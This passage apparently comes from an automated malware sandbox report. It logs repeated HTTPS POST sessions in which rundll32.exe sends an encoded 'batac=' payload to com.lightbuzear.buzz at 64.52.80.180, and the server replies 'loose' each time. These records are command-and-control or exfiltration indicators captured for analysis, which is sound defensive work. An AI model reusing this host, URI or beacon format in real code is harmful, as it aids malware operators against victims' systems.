              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:48 UTC37INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:48 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:48 UTC37INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              22192.168.2.224919464.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:49 UTC37OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:49 UTC38OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:50 UTC39INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:49 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:50 UTC39INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              23192.168.2.224919564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:50 UTC39OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:50 UTC39OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:51 UTC41INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:50 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:51 UTC41INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              24192.168.2.224919664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:51 UTC41OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:51 UTC41OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:52 UTC42INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:52 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:52 UTC42INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              25192.168.2.224919764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:53 UTC42OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:53 UTC43OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:53 UTC44INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:53 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:53 UTC44INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              26192.168.2.224919864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:54 UTC44OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:54 UTC44OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:54 UTC45INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:54 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:54 UTC46INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              27192.168.2.224919964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:55 UTC46OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:55 UTC46OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:56 UTC47INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:55 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:56 UTC47INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              28192.168.2.224920064.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:56 UTC47OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:56 UTC48OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:57 UTC49INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:56 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:57 UTC49INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              29192.168.2.224920164.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:57 UTC49OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:57 UTC49OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:58 UTC50INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:58 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:58 UTC51INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              3192.168.2.224917564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:28 UTC6OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:28 UTC7OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:29 UTC8INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:29 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:29 UTC8INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              30192.168.2.224920264.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:58 UTC51OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:58 UTC51OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:59 UTC52INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:59 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:59 UTC52INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              31192.168.2.224920364.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:59 UTC52OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:59 UTC53OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
